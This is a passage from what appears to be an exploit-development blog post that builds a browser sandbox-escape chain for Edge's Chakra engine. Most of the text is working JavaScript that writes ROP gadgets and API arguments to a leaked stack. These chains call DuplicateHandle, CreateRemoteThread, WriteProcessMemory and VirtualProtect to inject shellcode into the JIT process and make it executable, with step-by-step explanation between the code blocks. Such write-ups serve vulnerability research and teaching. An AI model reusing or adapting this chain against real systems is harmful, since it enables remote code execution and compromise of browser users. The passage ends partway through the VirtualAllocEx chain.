// LPTHREAD_START_ROUTINE can be set to anything, as CFG will check it and we will end up setting RIP directly later
// We will eventually hijack RSP of this thread with a ROP chain, and by setting RIP to a return gadget our thread, when executed, will return into our ROP chain
// We will update the thread later via another ROP chain to call SetThreadContext()

// LPTHREAD_START_ROUTINE lpStartAddress (R9)
// This can be any random data, since it will never be executed
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget dereferences a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x28b4fe, chakraHigh);      // 0x18028b4fe: Anything we want - this will never get executed
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();

// LPSECURITY_ATTRIBUTES lpThreadAttributes (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (default security properties)
next();

// SIZE_T dwStackSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // 0 (default stack size)
next();

// Call KERNELBASE!CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xdcfd0, kernelbaseHigh); // KERNELBASE!CreateRemoteThread
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!CreateRemoteThread)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!CreateRemoteThread - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPVOID lpParameter (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD dwCreationFlags (RSP+0x30) (CREATE_SUSPENDED to avoid executing the thread routine)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPDWORD lpThreadId (RSP+0x38)
next();
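The padding counts and the split 32-bit arguments in the chain above follow from simple arithmetic. The sketch below is only an illustration of that arithmetic, and both helper names (`paddingSlots`, `splitQword`) are hypothetical. It assumes each stack write covers one 8-byte slot, as the `next()` helper implies, and that a 64-bit value is passed to `write64` as a low and a high 32-bit half.

```javascript
const QWORD = 8; // bytes per stack slot, matching counter += 0x8 in next()

// Number of 8-byte filler slots skipped by an `add rsp, N ; ret` gadget.
function paddingSlots(adjustment) {
    if (!Number.isInteger(adjustment) || adjustment < 0 || adjustment % QWORD !== 0) {
        throw new RangeError("adjustment must be a non-negative multiple of 8");
    }
    return adjustment / QWORD;
}

// Splits a 64-bit value into [low32, high32] halves.
function splitQword(value) {
    const v = BigInt.asUintN(64, BigInt(value));
    return [Number(v & 0xffffffffn), Number(v >> 32n)];
}

console.log(paddingSlots(0x48)); // slots consumed after `mov r8, rdx ; add rsp, 0x48 ; ret`
console.log(paddingSlots(0x28)); // slots consumed after the `mov r9, rcx` gadget
console.log(paddingSlots(0x38)); // shadow space plus stack arguments after an API call
console.log(splitQword(-1n).map((half) => "0x" + half.toString(16)));
```

For example, `add rsp, 0x48` accounts for the nine padding writes that follow the `mov r8, rdx` gadget, and `(HANDLE)-1` splits into the two `0xffffffff` halves used for the pseudo-handle.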

You’ll notice right off the bat the comment stating that LPTHREAD_START_ROUTINE can be set to anything, as CFG will check it and we will end up setting RIP directly later. This seems to contradict what we just said about setting the thread’s entry point to a ROP gadget and simply returning into the stack. I implore the reader to keep the latter mindset for now, as it is the logical way to think about it, but by the end of the blog post I hope it is clear that things are a bit more nuanced than just setting the entry point to a ROP gadget. For now, this isn’t a big deal.

Let’s now see this in action. To make things easier, since we had been using pop rcx as a breakpoint up until this point, we will simply set a breakpoint on our jmp rax gadget and continue executing until we hit our WriteProcessMemory ROP chain (note that our jmp rax gadget will always be hit once before DuplicateHandle. This doesn’t affect us at all and is only mentioned for clarity). We will then use pt to execute the call to WriteProcessMemory until the ret, which will bring us into our CreateRemoteThread ROP chain.

Now that we have hit our CreateRemoteThread ROP chain, we will set up our lpStartAddress parameter, which will go in R9. We will first place a writable address in RAX so that the gadget containing mov r9, rcx (we pop our intended lpStartAddress value into RCX first) will not cause an access violation when its cmp r8d, [rax] instruction dereferences RAX.

Our call to CreateRemoteThread is in the current state:

CreateRemoteThread(
	-
	-
	-
	addressof(ret_gadget),		// Function pointer we want to execute (when the thread eventually executes, we want it to just return to the stack)
	-
	-
	-
);

The next parameter we are going to knock out is the hProcess parameter - which is just the same handle to the JIT server with PROCESS_ALL_ACCESS that we have used several times already.

We can see we used pop to get the address of our JIT handle into RCX, and then we dereferenced RCX to get the raw value of the handle into RCX. We also already had a writable value in RAX, so we “bypass” the operation which writes to the memory address contained in RAX (and it doesn’t cause an access violation because the address is writable).

Our call to CreateRemoteThread is now in this state:

CreateRemoteThread(
	fulljitHandle,			// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	-
	-
	addressof(ret_gadget),		// Function pointer we want to execute (when the thread eventually executes, we want it to just return to the stack)
	-
	-
	-
);

After retrieving the handle of the JIT process, the next parameter we will fill in is lpThreadAttributes, which just requires a value of 0. We can just directly write this value to the stack and use a pop operation to place the 0 value into RDX to essentially give our thread “normal” security attributes.

Easy as you’d like! Our call is now in the following state:

CreateRemoteThread(
	fulljitHandle,			// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	NULL,				// Default SECURITY_ATTRIBUTES
	-
	addressof(ret_gadget),		// Function pointer we want to execute (when the thread eventually executes, we want it to just return to the stack)
	-
	-
	-
);

Next up is the dwStackSize parameter. Again, we just want to use the default stack size (recall each thread has its own CPU register state, stack, etc.) - meaning we can specify 0 here.

We are now in the following state:

CreateRemoteThread(
	fulljitHandle,			// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	NULL,				// Default SECURITY_ATTRIBUTES
	0,				// Default Stack size
	addressof(ret_gadget),		// Function pointer we want to execute (when the thread eventually executes, we want it to just return to the stack)
	-
	-
	-
);

The rest of the parameters will be written to the stack at RSP + 0x28, 0x30, and 0x38. So, we will now place CreateRemoteThread into RAX and use our write primitive to write our remaining parameters to the stack (setting all of them to 0 except dwCreationFlags, which we set to 4 to create this thread in a suspended state).

Our call is now in its final state:

CreateRemoteThread(
	fulljitHandle,			// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	NULL,				// Default SECURITY_ATTRIBUTES
	0,				// Default Stack size
	addressof(ret_gadget),		// Function pointer we want to execute (when the thread eventually executes, we want it to just return to the stack)
	NULL,				// No variable needs to be passed
	4,				// CREATE_SUSPENDED (Create the thread in a suspended state)
	NULL 				// Don't return the thread ID (we don't need it)
);
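As a small aside, the value 4 passed for dwCreationFlags is a bit flag. The sketch below decodes a dwCreationFlags value into the flag names documented for CreateRemoteThread; the `decodeCreationFlags` helper is hypothetical and is only meant to show how the constant is interpreted.

```javascript
// Flag values documented for the dwCreationFlags parameter of CreateRemoteThread.
const CREATION_FLAGS = {
    CREATE_SUSPENDED: 0x00000004,
    STACK_SIZE_PARAM_IS_A_RESERVATION: 0x00010000,
};

// Returns the names of all flags set in `value`.
// A value of 0 means the thread runs immediately after creation.
function decodeCreationFlags(value) {
    const names = Object.keys(CREATION_FLAGS).filter(
        (name) => (value & CREATION_FLAGS[name]) !== 0
    );
    return names.length > 0 ? names : ["(run immediately)"];
}

console.log(decodeCreationFlags(4));
console.log(decodeCreationFlags(0));
```

With a value of 4 only CREATE_SUSPENDED is set, so the new thread does not run until it is explicitly resumed.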

After executing the call, we get our return value which is a handle to the new thread which lives in the JIT server process.

Running Process Hacker as an administrator and viewing the Handles tab will show our returned handle is, in fact, a Thread handle and refers to the JIT server process.

If we then close out of the window (but not totally out of Process Hacker) we can examine the thread ID (TID) within the Threads tab of the JIT process to confirm where our thread is and what start address it will execute when the thread becomes non-suspended (i.e. resumed).

As we can see, when this thread executes (it is currently suspended and not executing) it will perform a ret, which will load the value RSP points to into RIP (or will it? Keep reading towards the end and use critical thinking skills as to why this may not be the case!). Since we will eventually write our final ROP chain to the location RSP points to, this will kick off our last ROP chain which will mark our shellcode as RWX. Our next two ROP chains, which are fairly brief, will simply be used to update our final ROP chain. We now have a thread we can control in the process where ACG is disabled - meaning we are inching closer.
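To be precise about what a ret does, here is a toy model of the instruction. It is not an emulator: the `ret` function, the `cpu` object, and the `Map`-based memory are all assumptions made for illustration. The point is that ret pops the qword stored at the address in RSP into RIP and then advances RSP by 8.

```javascript
// Toy model of x64 `ret`: RIP <- qword at [RSP], then RSP <- RSP + 8.
// `memory` maps BigInt addresses to BigInt qword values.
function ret(cpu, memory) {
    const target = memory.get(cpu.rsp);
    if (target === undefined) {
        throw new Error("stack slot at RSP is not mapped in this toy model");
    }
    return { rip: target, rsp: cpu.rsp + 8n };
}

// Two stack slots holding arbitrary example values.
const memory = new Map([
    [0x1000n, 0xdeadbeefn],
    [0x1008n, 0xcafen],
]);

const before = { rip: 0x401000n, rsp: 0x1000n };
const after = ret(before, memory);

console.log("RIP = 0x" + after.rip.toString(16));
console.log("RSP = 0x" + after.rsp.toString(16));
```

Whatever value sits at the top of the stack when the ret executes becomes the next instruction pointer, which is why control over the stack contents translates into control over execution.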

WriteProcessMemory ROP Chain (Round 2)

Let’s quickly take a look at our “final” ROP chain (which currently resides in the content process, where our exploit is executing):

// VirtualProtect() ROP chain (will be called in the JIT process)
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x577fd4, chakraHigh);         // 0x180577fd4: pop rax ; ret
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x72E128, chakraHigh);         // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x46377, chakraHigh);          // 0x180046377: pop rcx ; ret
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x74e030, chakraHigh);         // PDWORD lpflOldProtect (any writable address -> Eventually placed in R9)
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0xf6270, chakraHigh);          // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x46377, chakraHigh);          // 0x180046377: pop rcx ; ret
inc();

// Store the current offset within the .data section into a var
ropoffsetOne = countMe;

write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x00000000);                // LPVOID lpAddress (Eventually will be updated to the address we want to mark as RWX, our shellcode)
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x1d2c9, chakraHigh);          // 0x18001d2c9: pop rdx ; ret
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00001000, 0x00000000);                // SIZE_T dwSize (0x1000)
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000040, 0x00000000);                // DWORD flNewProtect (PAGE_EXECUTE_READWRITE)
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x577fd4, chakraHigh);         // 0x180577fd4: pop rax ; ret
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, kernelbaseLo+0x61700, kernelbaseHigh);  // KERNELBASE!VirtualProtect
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x272beb, chakraHigh);         // 0x180272beb: jmp rax (Call KERNELBASE!VirtualProtect)
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x118b9, chakraHigh);          // 0x1800118b9: add rsp, 0x18 ; ret
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x4c1b65, chakraHigh);         // 0x1804c1b65: pop rdi ; ret
inc();

// Store the current offset within the .data section into a var
ropoffsetTwo = countMe;

write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x00000000);                // Will be updated with the VirtualAllocEx allocation (our shellcode)
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x1ef039, chakraHigh);         // 0x1801ef039: push rdi ; ret (Return into our shellcode)
inc();

This is a VirtualProtect ROP chain, which will mark the target pages as RWX. As we know, we cannot directly allocate and execute RWX pages via remote injection (VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread). Instead, we will eventually leak the stack of our remote thread that exists within the JIT process (where ACG is disabled). When we resume the thread, our ROP chain will kick off and mark our shellcode as RWX. However, there is a slight problem with this. Let me explain.

We know our shellcode resides in the JIT process at whatever memory address VirtualAllocEx decided. However, our VirtualProtect ROP chain (shown above and at the beginning of this blog post) was embedded within the .data section of the content process (in order to store it, so we can inject it later when the time comes). The issue we are facing is a “runtime problem”: our VirtualProtect ROP chain has no way to know in advance at what address our VirtualAllocEx ROP chain will place our shellcode. This is not only because the remote allocation occurs after we have “preserved” our VirtualProtect ROP chain, but also because we request a “private” region of memory from VirtualAllocEx, and the address of that region is “randomized” and subject to change with each call. We can see this in the following gadget:

write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x46377, chakraHigh);          // 0x180046377: pop rcx ; ret
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x00000000);                // LPVOID lpAddress (Eventually will be updated to the address we want to mark as RWX, our shellcode)
inc();

The above snippet is from our VirtualProtect ROP chain. This ROP chain is stored before any of the ROP chains we have been walking through (beginning with DuplicateHandle, right after we overwrite our return address) actually run, so the VirtualProtect ROP chain has no way to know where our shellcode is going to end up. lpAddress is a parameter that requires…

The address of the starting page of the region of pages whose access protection attributes are to be changed.

The shellcode, which we inject into the remote JIT process, is the lpAddress we want to mark as RWX eventually. However, our VirtualProtect ROP chain just uses a placeholder for this value. What we are going to do is use another call to WriteProcessMemory to update this address, at our exploit’s runtime. You’ll also notice the following snippet:

// Store the current offset within the .data section into a var
ropoffsetOne = countMe;

These are simply variables (ropoffsetOne, ropoffsetTwo, ropBegin) that save the current location of our “counter”, which is used to easily write gadgets 8 bytes at a time (we are on a 64-bit system, every pointer is 8 bytes). We “save” the current location in the ROP chain in a variable to allow us to easily write to it later. This will make more sense when we see the full call to WriteProcessMemory via ROP.
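
The bookkeeping described above can be sketched in isolation. What follows is a minimal, self-contained simulation and not the exploit itself: `scratch` and `writeQword` are hypothetical stand-ins for the chakra.dll .data region and the write64() primitive, and the gadget values and the shellcode address are made up for illustration.

```javascript
// Simulated scratch region made of 8-byte slots (assumption: a plain array, not real memory)
const scratch = [];
let countMe = 0;                          // byte offset of the next free slot

// Hypothetical stand-in for write64(): store one QWORD at a byte offset
function writeQword(offset, value) {
    scratch[offset / 8] = value;
}

// Advance the counter by one pointer-sized slot (8 bytes on a 64-bit system)
function inc() {
    countMe += 0x8;
}

writeQword(countMe, 0x1111n);             // made-up value standing in for a "pop rcx ; ret" gadget
inc();

// Save the offset of the placeholder before writing it
const ropoffsetOne = countMe;
writeQword(countMe, 0x0n);                // placeholder for lpAddress
inc();

writeQword(countMe, 0x2222n);             // made-up value standing in for the next gadget
inc();

// Later, once the real value is known, patch only the saved slot
const shellcodeAddress = 0x1234567000n;   // made-up address for illustration
writeQword(ropoffsetOne, shellcodeAddress);

console.log(ropoffsetOne.toString(16), scratch.map(v => "0x" + v.toString(16)));
```

Because the offset is captured before the placeholder is written, the later patch does not need to re-count gadgets or padding; it only needs the base address plus the saved offset.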

Here is how this call is set up:

WriteProcessMemory(
	(HANDLE)0xFFFFFFFFFFFFFFFF, 				// Pseudo handle to the current process (the content process, when the exploit is executing)
	addressof(VirtualProtectROPChain_offset),		// Address of the lpAddress placeholder in our stored VirtualProtect ROP chain (where we want to write the VirtualAllocEx allocation address to)
	addressof(VirtualAllocEx_Allocation),			// Address of the location holding our VirtualAllocEx allocation address (the allocation is where our shellcode resides in the JIT process at this point in the exploit)
	0x8,							// 64-bit pointer size (sizeof(QWORD))
	NULL 							// Optional
);
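
The effect of this call can be modeled with a small simulation. This is only a sketch under stated assumptions: a single `Uint8Array` stands in for the content process's address space, `writeProcessMemorySim` is a hypothetical helper that mimics the copy semantics of WriteProcessMemory on the current process, and the slot offsets and the allocation address are made up.

```javascript
// One flat buffer stands in for the content process's memory (assumption for illustration only)
const memory = new Uint8Array(0x100);
const view = new DataView(memory.buffer);

const ALLOCATION_SLOT = 0x10;    // hypothetical offset where the VirtualAllocEx return value was saved
const PLACEHOLDER_SLOT = 0x80;   // hypothetical offset of the lpAddress placeholder in the stored chain

// Pretend VirtualAllocEx returned this made-up address and it was saved earlier (little-endian)
view.setBigUint64(ALLOCATION_SLOT, 0x000001f2a4b30000n, true);

// Model of WriteProcessMemory(currentProcess, lpBaseAddress, lpBuffer, nSize, NULL):
// copy nSize bytes starting at lpBuffer to lpBaseAddress
function writeProcessMemorySim(lpBaseAddress, lpBuffer, nSize) {
    memory.copyWithin(lpBaseAddress, lpBuffer, lpBuffer + nSize);
    return true;
}

// Patch the placeholder with the 8-byte allocation address
writeProcessMemorySim(PLACEHOLDER_SLOT, ALLOCATION_SLOT, 0x8);

const patched = view.getBigUint64(PLACEHOLDER_SLOT, true);
console.log("0x" + patched.toString(16));
```

Note that lpBuffer is a pointer to the bytes to copy, not the value itself. This is why the ROP chain passes the address of the location where the allocation was saved rather than the allocation address directly.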

Our ROP chain will simply write the address of our shellcode in the remote JIT process (allocated via VirtualAllocEx) into our “final” VirtualProtect ROP chain, so that the VirtualProtect ROP chain knows which pages to mark RWX. This is achieved via ROP, as seen below (including all previous ROP chains):

// alert() for debugging
alert("DEBUG");

// Store the value of the handle to the JIT server by way of chakra!ScriptEngine::SetJITConnectionInfo (chakra!JITManager::s_jitManager+0x8)
jitHandle = read64(chakraLo+0x74d838, chakraHigh);

// Helper function to be called after each stack write to increment offset to be written to
function next()
{
    counter+=0x8;
}

// Begin ROP chain
// Since __fastcall requires parameters 5 and so on to be at RSP+0x20, we actually have to put them at RSP+0x28
// This is because we don't push a return address on the stack, as we don't "call" our APIs, we jump into them
// Because of this we have to compensate by starting them at RSP+0x28 since we can't count on a return address to push them there for us

// DuplicateHandle() ROP chain
// Stage 1 -> Abuse PROCESS_DUP_HANDLE handle to JIT server by performing DuplicateHandle() to get a handle to the JIT server with full permissions
// ACG is disabled in the JIT process
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1299

// Writing our ROP chain to the stack, stack+0x8, stack+0x10, etc. after return address overwrite to hijack control-flow transfer

// HANDLE hSourceProcessHandle (RCX) _should_ come first. However, we are configuring this parameter towards the end, as we need RCX for the lpTargetHandle parameter

// HANDLE hSourceHandle (RDX)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Pseudo-handle to current process
next();

// HANDLE hTargetProcessHandle (R8)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPHANDLE lpTargetHandle (R9)
// This needs to be a writable address where the full JIT handle will be stored
// Using .data section of chakra.dll in a part where there is no data
/*
0:053> dqs chakra+0x72E000+0x20010
00007ffc`052ae010  00000000`00000000
00007ffc`052ae018  00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72e128, chakraHigh);      // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server;
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hSourceProcessHandle (RCX)
// Handle to the JIT process from the content process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], jitHandle[0], jitHandle[1]);         // PROCESS_DUP_HANDLE HANDLE to JIT server
next();

// Call KERNELBASE!DuplicateHandle
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], duplicateHandle[0], duplicateHandle[1]); // KERNELBASE!DuplicateHandle (Recall this was our original leaked pointer var for kernelbase.dll)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!DuplicateHandle)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!DuplicateHandle - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // DWORD dwDesiredAccess (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // BOOL bInheritHandle (RSP+0x30)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000002, 0x00000000);             // DWORD dwOptions (RSP+0x38)
next();

// VirtualAllocEx() ROP chain
// Stage 2 -> Allocate memory in the Edge JIT process (we have a full handle there now)

// DWORD flAllocationType (R9)
// MEM_RESERVE (0x00002000) | MEM_COMMIT (0x00001000)
/*
0:031> ? 0x00002000 | 0x00001000 
Evaluate expression: 12288 = 00000000`00003000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures the future cmp r8d, [rax] gadget dereferences a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// SIZE_T dwSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // 0x1000 (shellcode size)
next();
